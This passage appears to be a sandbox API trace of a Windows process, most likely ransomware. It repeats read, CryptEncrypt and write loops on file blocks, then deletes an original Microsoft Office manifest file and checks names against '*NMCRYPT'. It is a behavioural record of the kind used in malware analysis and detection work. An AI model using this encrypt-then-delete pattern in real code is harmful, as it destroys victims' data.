lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.041] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.041] GetLastError () returned 0x0 [0173.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.042] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.042] GetLastError () returned 0x0 [0173.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.042] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.042] GetLastError () returned 0x0 [0173.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.042] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.042] GetLastError () returned 0x0 [0173.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.042] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.042] GetLastError () returned 0x0 [0173.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.042] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.042] GetLastError () returned 0x0 [0173.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.042] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.042] GetLastError () returned 0x0 [0173.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.043] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.043] GetLastError () returned 0x0 [0173.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.043] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.043] GetLastError () returned 0x0 [0173.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.043] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.043] GetLastError () returned 0x0 [0173.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.043] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.043] GetLastError () returned 0x0 [0173.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.043] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.043] GetLastError () returned 0x0 [0173.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.043] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.043] GetLastError () returned 0x0 [0173.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.044] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.044] GetLastError () returned 0x0 [0173.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.044] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.044] GetLastError () returned 0x0 [0173.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.044] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.044] GetLastError () returned 0x0 [0173.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.044] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.044] GetLastError () returned 0x0 [0173.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.044] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.044] GetLastError () returned 0x0 [0173.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.044] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.044] GetLastError () returned 0x0 [0173.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.044] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.045] GetLastError () returned 0x0 [0173.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.045] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.045] GetLastError () returned 0x0 [0173.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.045] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.045] GetLastError () returned 0x0 [0173.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.045] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.045] GetLastError () returned 0x0 [0173.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.045] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.045] GetLastError () returned 0x0 [0173.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.045] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.046] GetLastError () returned 0x0 [0173.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.046] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.046] GetLastError () returned 0x0 [0173.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.046] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.046] GetLastError () returned 0x0 [0173.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.046] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.046] GetLastError () returned 0x0 [0173.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.046] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.046] GetLastError () returned 0x0 [0173.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.046] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.047] GetLastError () returned 0x0 [0173.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.165] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 1 [0173.165] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml")) returned 1 [0173.168] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0173.168] wcslen (_String="OK") returned 0x2 [0173.168] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.168] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.168] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0173.168] CryptDestroyHash (hHash=0x9ad478) returned 1 [0173.168] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0173.168] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", pszSpec="*NMCRYPT") returned 0 [0173.168] PathMatchSpecW 